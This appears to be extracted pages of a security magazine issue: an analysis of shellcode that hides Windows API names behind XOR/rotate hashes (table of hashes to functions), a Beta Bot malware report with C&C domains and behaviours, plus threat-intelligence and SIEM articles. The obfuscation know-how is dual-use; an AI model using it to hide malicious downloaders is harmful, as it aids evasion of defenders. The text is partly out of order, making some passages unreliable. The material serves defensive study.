MOV EBX, [EBP+8]
While the mystery of the strange hexadecimal values continues, an even stranger subroutine shows up in the malware. It is not obvious what the purpose of the subroutine is, but there are some features of the code that hint at its purpose. Take a look at Figure 4 and see if you can determine anything useful from the subroutine instructions.
copies the EAX parameter from the stack frame into EBX inside the subroutine. This is a common way of using the stack to pass parameters. So, knowing this, a malware analyst might look at the disassembled code shown in Figure 3 and wonder what all the strange PUSHes are for
Figure 4: Subroutine with an unknown purpose
Here are some things to consider:
Figure 3: A series of strange PUSH values
Now, there does not appear to be anything useful in many of the pushed values, although there are two PUSHes that have values that look like ASCII codes. In fact, they are ASCII codes and represent the string “URLMON” if you are familiar with the order in which byte values get PUSHed in the Intel 80x86 architecture. This is quite interesting, and possibly a clue as to what the other strange values represent.
Issue 19 | Securitykaizen Magazine | 24
•The entry and exit instructions manipulate the runtime stack. •The EDX register is utilized to generate some kind of 32-bit result. •Values read from memory pointed to by EAX are used to alter EDX via an XOR operation. •The subroutine loops until the value read from memory is a zero. An experienced programmer may look at these characteristics and not see the overall purpose of the code. But sometimes intuition jumps in and creates that leap of understanding that ties everything together: this subroutine is creating a 32-bit hash value. Upon entry EAX points in memory to a 0-terminated string that represents the name of an exported DLL function. The bytes from the string are XORed with EDX and EDX is rotated 3 bits prior to each XOR operation.
The 32-bit value in EDX represents the hash value of the memory string. Figure 5 shows the same code with comments added
Figure 5: Mystery revealed: 32-bit hash generator
What is the purpose of this code? It is used to build a hash value that represents the exported function name from a DLL. The purpose of the hash value is to hide the name of the exported function from anyone performing reverse engineering or malware analysis on the code. For example, running the code of a typical WIN32 program through the Strings program will reveal the text-based exported function list, an example of which is shown here: ReadFile CreateFileA GetProcessHeap FreeLibrary GetCPInfo GetACP
GetOEMCP VirtualQuery InterlockedExchange MultiByteToWideChar GetStringTypeA GetStringTypeW
The hex value 410E2A69 is the malware writer’s way of hiding the name of the KERNEL32.DLL exported function MoveFileA being called. Going through the malicious assembly language, all the hash values being PUSHed were located and looked up. Some values did not match the list generated from KERNEL32. DLL, so exported function names from URLMON.DLL and NTDLL.DL were used as well. Here are the corresponding DLL functions, in the order they are called from the code: Hash Value
DLL Function
DLL
A412FD89
LoadLibraryA
KERNEL32.DLL
E4EC2161
URLDownloadToCacheFileA
URLMON.DLL
2D6D019
LocalAlloc
KERNEL32.DLL
C5FF2F46
VirtualProtect
KERNEL32.DLL
410E2A69
MoveFileA
KERNEL32.DLL
16EF74B
WinExec
KERNEL32.DLL
D6196BE1
RtlExitUserThread
NTDLL.DLL
Just seeing this sequence of DLL calls reveals the overall intent of the malicious code. A file is downloaded from the Internet (via URLDownloadToCacheFileA) and executed (with WinExec).
Mystery Revealed Having discovered all these secrets and tricks, we can now determine what the main portion of the machine language payload does:
To disguise the exported function name the malware writer uses the hash value in place of the function name. To test this theory, a simple C program was written that duplicates the functionality of the hashing subroutine, using the same XOR and 3-bit rotate operations. A file containing all of the exported function names from KERNEL32.DLL is passed to the C program, which generates the 32-bit hash values for each function name. Here is a small portion of the results:
Figure 7: Strange PUSH values finally revealed
Figure 6: Hash values for KERNEL32.DLL exported function names
So, with a little effort and inspiration, the malware coder’s efforts to disguise what was really going on in the malicious code were defeated and its functionality revealed. The fascinating thing to think about here is that the malware coder took the technique of hashing and re-purposed it for something else. This is why creativity and imagination is important. It is important to the malware coder and it is also important to the malware analyst.
Issue 19 | www.bluekaizen.org | 25
www.bluekaizen.org
Reviews
Malware Review
Neurevt bot Malware Analysis Introduction Neurevt bot “Beta Bot� has a lot of functionalities along with an extendable and flexible infrastructure. Upon installation, the bot injects itself into almost all user processes to take over the whole system. Moreover, it utilizes a mechanism that makes use of Windows messages and the registry to coordinate those injected codes. The bot communicates with its C&C server through HTTP requests. Different parts of the communication data are encrypted (mostly with RC4). Many components cover a large number of the most popular malicious functionalities, including downloading malware, DDoS attacks, and credentials stealing.
File Identification
Eng. May Medhat Malware Analyst at EG CERT Issue 19 | Securitykaizen Magazine | 26
MD5
A4EDEA3CECE92C31D4C4049850F44A9E
SHA-1
6ADB7E751EE4F7C407832BC327E8CC16E8BBB679
Size(bytes)
231936
SubSystem
Windows GUI
Type
Executable
Information Gathering The following snippets found during this phase show some capabilities for real “Beta bot” for sale:
Neurevt Behavioral Analysis 1] Malware sets the below registry “ShowSuperHidden” to zero (default=1) to hide with protected operating system files:
. HKU\S-1-5-21-3506987661-2624146946-3848342493-1000\ Explorer\Advanced\ShowSuperHidd en: 0x00000000
Software\Microsoft\Windows\CurrentVersion\
2] Betabot creates winlogon0 folder and copies itself with random named under the following paths:
. C:\ProgramData\winlogon0\[random_name].exe . C:\Users\All Users\winlogon0\[random_name].exe First path will be used by malware for persistence as shown by autorun tool output .
3] System Monitoring:
. Process neurevta4e.exe was started by explorer.exe Process “[random name].exe” was started by parent process “neurevta4e.exe” .Process wuauclt.exe was started by “[random name].exe” and tries to connect to the malicious domain 7obby.com 4] By exploring memory of running processes with “RWX” protection, it has been observed that malware copied itself to the same memory area “0x7ff20000-0x7ffa2000” for many processes to keep persistence except explorer.exe infected memory area “0x7ff10000-0x7ff92000.
Infected processes are neither system authority processes nor services processes; they are all under the same user account running the infected processes as shown below: Issue 19 | www.bluekaizen.org | 27
5] UserMode System Call hooking: The sample uses “KiFastSyatemCall” function which will be used at the user mode system call hooking.For more information about this system call hooking technique, check the following link: http://www.malwaretech.com/2014/06/usermode-system-call-hookingbetabot.html 6] Network Monitoring: Injected process wuauclt.exe “PID=700” tests connection by query “www.update.microsoft.nsatc.net” Then, wuacult PID=700” establishes connection to “7obby.com” with the upcoming fake user agent (malware uses fake popular user agent to avoid network layer detection): Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726) Issue 19 | Securitykaizen Magazine | 28
The below screenshot shows that malware sends encrypted messages to command and controller stored at ps0, ps1, cs0, cs1, cs2, cs3
svchost.exe process tries to resolve the following domains but it could not find such names
7] Configuration Extraction: The configuration section of the bot, this section is encrypted inside the bot and decrypted while the bot is running could be extracted using betabot-re script published at this link https://github.com/KenMacD/betabot-re
Issue 19 | www.bluekaizen.org | 29
The output shows Betabot version=1.0.2.5, owner is as shown “792476” primary malicious domain “7obby.com” and its backup domain betabot.zapto.org and betabu.zapto.org and keys used for encryption.
Malware Capabilities The following shows some of the malware capabilities: Gathering Information about softwares: Neurevt detects and gathers information about many softwares specially security and gaming softwares through open registries keys .
Detect many antivirus products: The following screenshot is an example of AVG antivirus processes detected by sample
Privilege detection and escalation: RtlQueryElevationFlags: A pointer to a variable that receives the elevation state
It tries to escalate privileges through fake errors with different languages to escalate privileges using “UAC” User Access Control Message feature that could appear as shown at below screenshots:
Credentials Stealing Neurevt tries to steal FTP software credentials an example screenshot for Filezilla shown below: Issue 19 | Securitykaizen Magazine | 30
DDOS toolkit: Trojan may perform DDOS attack using the following tools condis , slowloris, udp also malware contains fake user agents that could help to launch this attack
Skype Spam: Neurevt tries to access Skype via SendInput API like “tSkMainFom” and “TZapCommunicator” and send message to contacts :
Issue 19 | www.bluekaizen.org | 31
Recommendations Think, before you click! Read the prompts your system shows you and do not click “Yes” or “OK” thoughtlessly. In case of doubt, ask someone for help or try to search the Internet for more information about the prompt in question. An up-to-date comprehensive security solution with a malware scanner, firewall, web and real-time protection is an absolute must. A spam filter that protects you from unwanted spam emails also makes sense. The installed operating system, browser and its components as well as the security solution installed should always be kept up-to-date. Program updates should be installed as soon as possible to close existing security vulnerabilities. In addition to these recommendations, more details exist at the following link: https://blog.gdatasoftware.com/ blog/article/a-new-bot-on-the-market-beta-bot.html
Removal To detect and remove this threat and other malicious software that may be installed on your computer, run a fullsystem scan with an appropriate, up-to-date, security solution.
Issue 19 | Securitykaizen Magazine | 32
www.bluekaizen.org
Reviews
Intelligence Review
Knowing Your Adversary - Implementing a Cyber Threat Intelligence Program
Introduction As far back as I could remember, there was always a need to have additional information for validation or confirmation that an incident, security event, investigation was complete or just when it came to plain old protecting the company from threats. No matter the industry, all companies doing business on the World Wide Web aka “Internet�, must have a program in place to receive and/or provide intelligence and other information, in order to achieve the big picture when it pertains to any threat, aka your adversaries. It is important to also remember that adversaries do not necessarily have to be external sources, because the number one threat to all companies is the insider, negligent or not
Harris D. Schwartz Safeway Corporate Information Security Lead, Incident Response & Cyber Threat Intelligence Issue 19 | www.bluekaizen.org | 33
COMPOSITION OF CYBER INTELLIGENCE PROGRAM
THREAT
When it pertains to the design and structure of your cyber threat intelligence (CTI) program there will be known dependencies and contributors to think about and plan out. Not all CTI programs will be alike, although many might be similar or consistent due to industry working groups and collaborative arrangements between similar companies, e.g. big box retailers may have similar framework and structure because the 2 or 3 companies are working together to identify and benchmark cyber threats. Knowing what content will comprise your CTI program will come from the benefit of knowing your own organization and the possible sources of information that can be “fed” or “ingested” into your CTI program. Also to note that not all CTI programs have to be completely automated; there could be part manual and part automated or for the most part automated and a little manual. So, when we discuss dependencies, what am I speaking about? Well, as I mentioned previously, knowing your environment and corporate landscape will be important when deciding what content or information you would like or think needs to be consumed as intelligence sources within your CTI program. Coupled with knowing your organization is the concept of access and visibility with stakeholders in your company environment, and the ability to influence where needed to gain support for your CTI program. After all, the intelligence information (and hopefully actionable at least) you receive and analyze will be purposeful to your internal business partners and stakeholders. The other aspect of dependencies is the availability of internal technology resources, which also includes log sources. A CTI program can work independently of or in concert with your SIEM technology as well. The other primary consideration for your Cyber Threat Intelligence program are the contributors, or sources for your program. Contributors can be broken down into 4 categories (or more if needed): A. Internal Partners B. External Sources C. Technology and Monitoring D. Compliance and Risk Lets examine some examples of each category so you get a better picture of what sources would fall where. Internal Partners: These sources could include Loss Prevention, Business Intelligence, Corporate Security (Physical), Human Resources, Risk Management, Investor Relations. Issue 19 | Securitykaizen Magazine | 34
External Sources: The sources in this category include industry working groups, industry information sharing groups and listservs, government agencies, other corporate partners, etc. Technology and Monitoring: Sources such as your SIEM feeds, independent log sources from firewalls, Intrusion Detection (IDS), anti-malware, etc., proactive monitoring and investigation initiatives and other associated data. Compliance and Risk: Your various groups within InfoSec including risk, compliance, governance and associated groups.
BUILDING YOUR FRAMEWORK (Insert attached graphic for framework overview) When building any program or initiative its important to build a “framework” of how your program will work/ operate at a high level. You could add granularity where needed or made sense. The graphic above depicts a sample framework that I have utilized and planned at numerous companies (where I worked) and/or companies I consulted with. There are a couple of key decisions that can be made at this point in the game: How automated will the program be? In some instances, companies maintain different components in their program. As an example, the company may subscribe to threat feeds that they ingest into their SIEM environment. If a company utilizes a fully managed service aka Managed Security Solutions Provider (MSSP), then most of those ingest their own threat feeds and/or other external feeds as well. To SIEM or not to SIEM? So in the above example, external threat feeds can be ingested into your SIEM solution and then correlated with your existing log data. Some companies choose to utilize a “threat correlator solution” that acts as the overall CTI SIEM and all data (sources, contributors) flows into threat correlator. A contributor of this data would be some or all of your SIEM logs. Outcome of all the threat data: Based on your needs or wants, your CTI analysts can be producing various end products including risk and threat assessments, Information Security Advisories that contain actionable intelligence, critical vulnerability alerts, identify issues within the organization that require additional investigation or research, link analysis between various events that could identify patterns or trends in your organization and there could be instances where security gaps are identified which require policy change in the environment.
IDENTIFYING YOUR ADVERSARIES Most companies I know or I have worked with, they want to know or have a good idea of who the threats are and where they are originating from. The combination of your CTI actions coupled with monitoring of your network will weed out the “small stones hitting the glass window” and raise to the surface your real threats, both inside and outside. This is where the cooperation between your CTI team and Security Operations team comes into play, through monitoring activities to identify normal and abnormal traffic and activity on your network. The Insider threat can include what I like to call, “negligent insiders” and/or the insiders that are purposeful and know exactly what they are doing, either recruited by third parties or working alone. In instances where there may be heightened events like discharges, layoffs and reduction in force events, partnering with your HR teams will be beneficial in identifying potential threats before they become serious issues. The other type of insider that tends to be an issue are the “sympathizers” to outside groups like animal or environmental activist groups. These types of people need to be closely monitored in order to prevent issues from trending. External threats can be wide and far ranging, everything from an activist organization with a cyber arm to it, extremist organizations, sympathizer organizations, nation states, terrorism groups, cyber hacker organizations, cyber espionage teams, organized criminal gangs and the list goes on. Those “small stones hitting the glass” threats are typically kids aged 13-17, who may have some great computer skills but bored at home with nothing to do and through the use of online “crime-as-a-service” offerings end up sending large numbers of packets your way in the form of a Syn Flood or sometimes, larger Distributed Denial of Service (DDOS) attack.
BENEFITS AND ADVANTAGES For all purposes, creating, building and implementing a cyber threat intelligence program can be extremely beneficial for any organization, because you will likely stay “ahead of the curve” or in this case your adversaries or threats. Your ability to not only gather technical indicators of compromise (IOC), indicators of attack (IOA) and additional information, your CTI team can start to build intelligence and information related to the cyber threat actors and groups behind the various tactics, tools and procedures (TTP’s) identified through your program. This is where “knowing your adversary” is very important. If you know who or what is targeting your company, or executives or systems, then you will have a better chance of preventing and
mitigating issues (security events) before they can transform quickly into critical issues (security incidents) that can lead to far worse things like compromises, system breach, denial or services and/or degradation of resources. Better yet, protecting your company’s name, reputation, brand and revenue is important as well Additional advantages of your cyber threat intelligence program can be created between your security department and your internal customers (stakeholders, business units, etc.) As an example, if you were to produce a weekly or daily threat intelligence report and distribute to your internal partners and try and make the content as relevant to your company as possible, these reports could open the door for internal customers requesting assistance in the form of a risk assessment for a new service they might be offering. These types of reports when distributed the right people, there could be situations where additional internal partners will be identified that request to be included in these reports. This opens up visibility to you and heightens your exposure in the company environment. The more people know about you the better. When it comes down to implementing your program there is nothing wrong in taking steps. As an example, you may start out with threat feeds ingested by your SIEM and an analyst working to create reports and advisories through monitoring and proactive investigations. Then there are cases, where some industries are far more likely to have consistent cyber threat targeting like energy, government and entertainment companies, so in these cases a more robust program needs to be implemented quicker. Every company or organization will be different when it comes down to implementing your program. In situations where your executives are less interested in a CTI program or they believe it is not necessary, it will be important for you, the security executive or manager to conduct a risk / threat profile exercise, either on your own or hiring a contractor to build a profile on what your risks and threats are facing your company. If you address these concerns with your executives in this manner and can tie other examples of brand failure, or legal actions or other negative affects caused by the threat groups, your company executives are likely to change their minds very quickly. Outside all of this, any introduction of “actionable” intelligence that you can provide regarding a pending threat to the company or systems (zero-day vulnerability that could open your company up to hackers), most executives can see the bigger picture and will approve some spending in some level of a cyber threat intelligence program. It might just be the matter of “crawl, walk, run.....” Issue 19 | www.bluekaizen.org | 35
www.bluekaizen.org
Best Practice
Operating
SIEM Solution Greetings, In this article i would like to talk about SIEM technology from another perspective, Firstly let me ask a question – Lets imagine you have a SIEM solution integrated with all nodes in your network, will this mean you are getting fully benefits from the SIEM ?. Security Information & Event Management is defined as a real-time monitoring technology for all security logs collected from whatever devices you have. Obviously any SIEM project has two main phases Integration & Operation. In this article I won’taddress any of integration techniques with SIEM because I know everyone can easily integrate his/her devices, applications, systems... etc.
Ayman Hammouda
Senior Information Security Engineer at Security Meter Issue 19 | Securitykaizen Magazine | 36
But when you hearthis quote “SIEM Solution Is theBackBone for Any Security Operation Center” you have to think about SIEM Operation. Let’s start by having a SIEM solution integrated with all Systems, Devices, Applications...etc in our network … Now What will be the next step? The next steps will the operation part as follows:
Defining the organization Administrator Accounts Because administrators are the powerful accounts and the highest privilege in any environment so compromising such account will be the highest risk. You will need to track every single activity taken by those admins thus you have to define administrator accounts in SIEM solution.
Defining Hierarchy
the
organization
Network
Imagine this step as you are teaching your network zones to SIEM Solution, from my point of view you will need to define at least the following zones: oDMZ oInternal Server Zones oVOIP Networks oWireless Networks oVPN Address Spaces oCompliance Networks
Defining the organization Servers In this step, you will define your servers as per single function, at least following functions have to be addressed: oLDAP Servers oDHCP Servers oDNS Servers oMail Servers oProxy Servers oDatabase Servers oFTP Servers oSSH Servers oSyslog Servers oSNMP Servers oVOIP PBX Servers oVPN Servers oWeb Servers oVulnerability Assessment Servers oRemote Servers oNetwork Management Servers oUpdating Servers, that are used for example for updating antivirus signatures...etc
Defining uncommon TCP/UDP ports Most of organizations don’t use the default ports for known Applications, Databases and Services...etc, so you will need to define the non-default ports in your environment to be tracked by SIEM Solution and reduce false positive.
Defining organization sensitive data Sensitive data vary from one organization to another, so you will need to define any sensitive data from your organization perspective like HR Data – Financial Data – CreditCards – Source Codes...etc.
Correlation Rules Tuning This is considered the output for all the above phases, any SIEM solution has its built-in correlation rules, but tuning SIEM correlation is an on-going process that must be taken in consideration as it differ from environment to another. I think you can start by the organization policy and translate it to correlation rules, after that try to search for test cases in your environment (applications, servers, database ...etc) and create the correlation rules to detect such deviation. For Example, I notice that someone before has created a correlation rule to detect the raise in temperature for specific critical network devices to solve a downtime issue. Finally always remember that not all correlation rules, An Offense.
Reporting & Monitoring Monitoring a SIEM Solution is not to track only offenses generated by the SIEM, for more efficiency you will have to give a look for log activities collected from your devices to track any abnormal behavior that is not defined in your correlation rules. Reporting is considered the important part in SIEM for SOC Operation, from above steps you can list some of important reports as follows: oUser Tracking per all systems oAdministrative Activity Tracking. oSuccessful & Failed Admin/Normal User Authentications. oUser Creation, Deletion & Modification. oOffenses Status. oTraffic from DMZ/Internet zones to Internal zone oTraffic to Internal Server zone oCompliance reports for PCI, ISO27K. oPolicy violations oUnsecured services used oStatistics for all inbound & outbound traffic
Finally flow integration, which will give you a deeper analysis on network packets flow, and also integration with Vulnerability assessment tools, this will enhance the intelligence for SIEM Solution with powerful correlation between Vulnerability and Exploit detection. At This point, you are now having an efficient SIEM Solution with admin accounts defined, Network hierarchy, all the organization servers, sensitive data tracking, built-in & your own correlation rules and finally report generation & monitoring.
Issue 19 | www.bluekaizen.org | 37